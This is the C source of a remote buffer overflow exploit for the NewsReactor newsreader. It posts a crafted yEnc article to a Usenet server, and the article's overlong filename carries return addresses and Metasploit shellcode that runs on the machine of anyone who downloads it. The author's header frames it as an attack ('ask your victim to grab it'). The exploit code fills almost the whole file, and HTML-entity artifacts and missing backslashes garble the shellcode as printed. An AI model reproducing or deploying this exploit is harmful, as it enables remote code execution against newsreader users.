NewsReactor 20070220 Article Grabbing Remote BoF Exploit (2)

                                                /*********************************************************************************
*         NewsReactor 20070220 Article Grabbing Remote Buffer Overflow           *
*                                Exploit 2                                       *
*                                                                                *
*                                                                                *
* Check the other advisory for technical details.                                *
*                                                                                *
* This exploit connects to your newsgroups provider and posts a crafted article. *
*                                                                                *
* Ask your victim to grab it to trigger the bug and execute calc.exe.            *
* Return address should work on XP SP2 FR.                                       *
* Should fail on english systems cause I took the first return address I got =D. *
* Have Fun!                                                                      *
*                                                                                *
* Tested against WIN XP SP2 FR                                                   *
*&nbsp;Coded&nbsp;and&nbsp;Discovered&nbsp;by&nbsp;Marsu&nbsp;<[email protected]>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*
*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*
*&nbsp;Note:&nbsp;change&nbsp;evilbuff&nbsp;to&nbsp;crash&nbsp;News&nbsp;Bin&nbsp;Pro&nbsp;4.32.&nbsp;800&nbsp;\'A\'&nbsp;should&nbsp;be&nbsp;enough.&nbsp;&nbsp;&nbsp;&nbsp;*
*********************************************************************************/


#include&nbsp;\"winsock2.h\"
#include&nbsp;\"stdio.h\"
#include&nbsp;\"stdlib.h\"
#pragma&nbsp;comment(lib,&nbsp;\"ws2_32.lib\")


/*&nbsp;win32_exec&nbsp;-&nbsp;&nbsp;EXITFUNC=process&nbsp;CMD=calc.exe&nbsp;Size=351&nbsp;Encoder=PexAlphaNum&nbsp;http://metasploit.com&nbsp;*/
/*&nbsp;0x00&nbsp;0x0b&nbsp;0x0c&nbsp;0x0a&nbsp;0x0d&nbsp;0x0e&nbsp;0x0f&nbsp;0x09&nbsp;0x20&nbsp;0x22&nbsp;0x7C&nbsp;*/
char&nbsp;calcshellcode[]&nbsp;=
\"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49\"
\"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36\"
\"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34\"
\"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41\"
\"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44\"
\"x42x30x42x50x42x30x4bx48x45x34x4ex53x4bx58x4ex37\"
\"x45x50x4ax57x41x50x4fx4ex4bx48x4fx34x4ax51x4bx48\"
\"x4fx55x42x52x41x50x4bx4ex49x54x4bx38x46x53x4bx58\"
\"x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c\"
\"x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e\"
\"x46x4fx4bx53x46x35x46x42x46x30x45x57x45x4ex4bx58\"
\"x4fx45x46x52x41x50x4bx4ex48x36x4bx58x4ex50x4bx44\"
\"x4bx48x4fx55x4ex51x41x50x4bx4ex4bx48x4ex51x4bx48\"
\"x41x50x4bx4ex49x48x4ex45x46x52x46x50x43x4cx41x43\"
\"x42x4cx46x56x4bx48x42x34x42x53x45x48x42x4cx4ax47\"
\"x4ex30x4bx48x42x54x4ex30x4bx58x42x37x4ex51x4dx4a\"
\"x4bx38x4ax46x4ax50x4bx4ex49x30x4bx48x42x48x42x4b\"
\"x42x30x42x50x42x30x4bx48x4ax56x4ex53x4fx35x41x53\"
\"x48x4fx42x46x48x35x49x58x4ax4fx43x48x42x4cx4bx37\"
\"x42x35x4ax56x50x47x4ax4dx44x4ex43x57x4ax56x4ax59\"
\"x50x4fx4cx58x50x50x47x45x4fx4fx47x4ex43x56x41x56\"
\"x4ex56x43x36x50x42x45x56x4ax47x45x36x42x30x5a\";

int&nbsp;main(int&nbsp;argc,&nbsp;char*&nbsp;argv[])
{
	struct&nbsp;hostent&nbsp;*he;
	struct&nbsp;sockaddr_in&nbsp;sock_addr;
	WSADATA&nbsp;wsa;
	int&nbsp;nntpsock;
	char&nbsp;recvbuff[500];
	char&nbsp;buffer[100];
	char&nbsp;authuser[]=\"AUTHINFO&nbsp;USER&nbsp;%s
\";
	char&nbsp;authpass[]=\"AUTHINFO&nbsp;PASS&nbsp;%s
\";
	char&nbsp;evilbuff[10000];
	char&nbsp;*user=0,*pass=0,*subject,*group,*author;
	int&nbsp;i=2;

	WSACleanup();
	WSAStartup(MAKEWORD(2,0),&wsa);

	if&nbsp;(argc<5)&nbsp;{
		printf(\"[+]&nbsp;NewsReactor&nbsp;Article&nbsp;Grabbing&nbsp;Remote&nbsp;Buffer&nbsp;Overflow
\");
		printf(\"[+]&nbsp;Coded&nbsp;and&nbsp;Discovered&nbsp;by&nbsp;Marsu&nbsp;<[email protected]>
\");
		printf(\"[+]&nbsp;Usage:&nbsp;%s&nbsp;Newsserver&nbsp;[-u&nbsp;User]&nbsp;[-p&nbsp;Pass]&nbsp;Group&nbsp;Subject&nbsp;Author
\",argv[0]);
		printf(\"[+]&nbsp;example:
&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;news.giganews.com&nbsp;-i&nbsp;user&nbsp;-p&nbsp;pass&nbsp;alt.binaries.dvdr&nbsp;boomboom&nbsp;superman
\",argv[0]);
		return&nbsp;0;
	}
	
	if&nbsp;(strstr(argv[i],\"-u\"))&nbsp;{
		i++;
		user=argv[i];
		i++;
	}
	if&nbsp;(strstr(argv[i],\"-p\"))&nbsp;{
		i++;
		pass=argv[i];
		i++;
	}
	group=argv[i++];
	subject=argv[i++];
	author=argv[i];
	
	printf(\"%s&nbsp;
%s&nbsp;
%s&nbsp;
\",group,subject,author);
	if&nbsp;((he=gethostbyname(argv[1]))&nbsp;==&nbsp;NULL)&nbsp;{&nbsp;
		printf(\"Failed
[-]&nbsp;Could&nbsp;not&nbsp;init&nbsp;gethostbyname
\");
		return&nbsp;1;
	}
	if&nbsp;((nntpsock&nbsp;=&nbsp;socket(PF_INET,&nbsp;SOCK_STREAM,&nbsp;0))&nbsp;==&nbsp;-1)&nbsp;{
		printf(\"Failed
[-]&nbsp;Socket&nbsp;error
\");
		return&nbsp;1;
	}

	sock_addr.sin_family&nbsp;=&nbsp;PF_INET;
	sock_addr.sin_port&nbsp;=&nbsp;htons(119);
	sock_addr.sin_addr&nbsp;=&nbsp;*((struct&nbsp;in_addr&nbsp;*)he->h_addr);
	memset(&(sock_addr.sin_zero),&nbsp;\'\',&nbsp;8);
	if&nbsp;(connect(nntpsock,&nbsp;(struct&nbsp;sockaddr&nbsp;*)&sock_addr,&nbsp;sizeof(struct&nbsp;sockaddr))&nbsp;==&nbsp;-1)&nbsp;{
		printf(\"[-]&nbsp;Unable&nbsp;to&nbsp;connect
\");
		return&nbsp;1;
	}
	printf(\"[+]&nbsp;Connected&nbsp;to&nbsp;%s
\",argv[1]);
	memset(recvbuff,\'\',500);
	recv(nntpsock,&nbsp;recvbuff,&nbsp;500,&nbsp;0);
	printf(\"->&nbsp;%s\",recvbuff);
	
	if&nbsp;(user!=0)&nbsp;{
		memset(buffer,0,100);
		sprintf(buffer,authuser,user);
		send(nntpsock,buffer,strlen(buffer),0);
		printf(\"[+]&nbsp;USER&nbsp;%s
\",user);
		memset(recvbuff,\'\',500);
		recv(nntpsock,&nbsp;recvbuff,&nbsp;500,&nbsp;0);
		printf(\"->&nbsp;%s\",recvbuff);
	}
	
	if&nbsp;(pass!=0)&nbsp;{
		memset(buffer,0,100);
		sprintf(buffer,authpass,pass);
		send(nntpsock,buffer,strlen(buffer),0);
		printf(\"[+]&nbsp;PASS&nbsp;%s
\",pass);
		memset(recvbuff,\'\',500);
		recv(nntpsock,&nbsp;recvbuff,&nbsp;500,&nbsp;0);
		printf(\"->&nbsp;%s\",recvbuff);
	}
	
	send(nntpsock,\"MODE&nbsp;READER
\",strlen(\"MODE&nbsp;READER
\"),0);
	printf(\"[+]&nbsp;MODE&nbsp;READER
\");
	memset(recvbuff,\'\',500);
	recv(nntpsock,&nbsp;recvbuff,&nbsp;500,&nbsp;0);
	printf(\"->&nbsp;%s\",recvbuff);
	
	send(nntpsock,\"POST
\",strlen(\"POST
\"),0);
	printf(\"[+]&nbsp;POST
\");
	memset(recvbuff,\'\',500);
	recv(nntpsock,&nbsp;recvbuff,&nbsp;500,&nbsp;0);
	printf(\"->&nbsp;%s\",recvbuff);
	
char&nbsp;header[]=
\"From:&nbsp;%s&nbsp;<%[email protected]>
\"
\"Newsgroups:&nbsp;%s
\"
\"Subject:&nbsp;%s&nbsp;(1/1)&nbsp;
\"
\"X-Newsreader:&nbsp;blabla

\";

char&nbsp;fileheader[]=\"=ybegin&nbsp;part=1&nbsp;line=128&nbsp;size=127&nbsp;name=\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAA\"
\"xD6xE6xE3x77\"&nbsp;//jmp&nbsp;EDI&nbsp;in&nbsp;advapi32.dll&nbsp;XP&nbsp;SP2&nbsp;FR.
\"xD6xE6xE3x77\"&nbsp;//ugly&nbsp;but&nbsp;we&nbsp;don\'t&nbsp;know&nbsp;where&nbsp;we&nbsp;land...
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"&nbsp;
\"xD6xE6xE3x77\"
\"AAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"
\"AAAAAAAA\";

char&nbsp;file[]=\"=ypart&nbsp;begin=1&nbsp;end=127
\"&nbsp;&nbsp;//encoded&nbsp;file.&nbsp;Doesnt&nbsp;matter&nbsp;but&nbsp;works!
\"vkJmyvvsxoJkJno}J..J\\74n.ncJ.Q......?474...?JWJ[X]]J?.......廕^Y]74?.JWJk.....滼\\XZVJ?....滼\\XZ74}..滼....彎JdJp.....?
\";
char&nbsp;fileend[]=\"=yend&nbsp;size=127&nbsp;part=1&nbsp;pcrc32=d4f19f0f
\";
char&nbsp;postend[]=\"
.
\";


	memset(evilbuff,0,10000);
	sprintf(evilbuff,header,author,author,group,subject);
	printf(\"[+]&nbsp;Message&nbsp;header:
%s\",evilbuff);
	send(nntpsock,evilbuff,strlen(evilbuff),0);
	Sleep(100);

	memset(evilbuff,0,10000);
	memcpy(evilbuff,fileheader,strlen(fileheader));
	memcpy(evilbuff+strlen(fileheader),calcshellcode,strlen(calcshellcode));
	memcpy(evilbuff+strlen(fileheader)+strlen(calcshellcode),\"
\",3);
	send(nntpsock,evilbuff,strlen(evilbuff),0);
	Sleep(100);

	send(nntpsock,file,strlen(file),0);
	Sleep(100);
	send(nntpsock,fileend,strlen(fileend),0);
	Sleep(100);
	send(nntpsock,postend,strlen(postend),0);
	Sleep(100);
	
	memset(recvbuff,\'\',500);
	recv(nntpsock,&nbsp;recvbuff,&nbsp;500,&nbsp;0);
	printf(\"->&nbsp;%s\",recvbuff);

	printf(\"[+]&nbsp;Article&nbsp;posted.&nbsp;Have&nbsp;fun
\");
	Sleep(1000);
	return&nbsp;0;
}

&nbsp;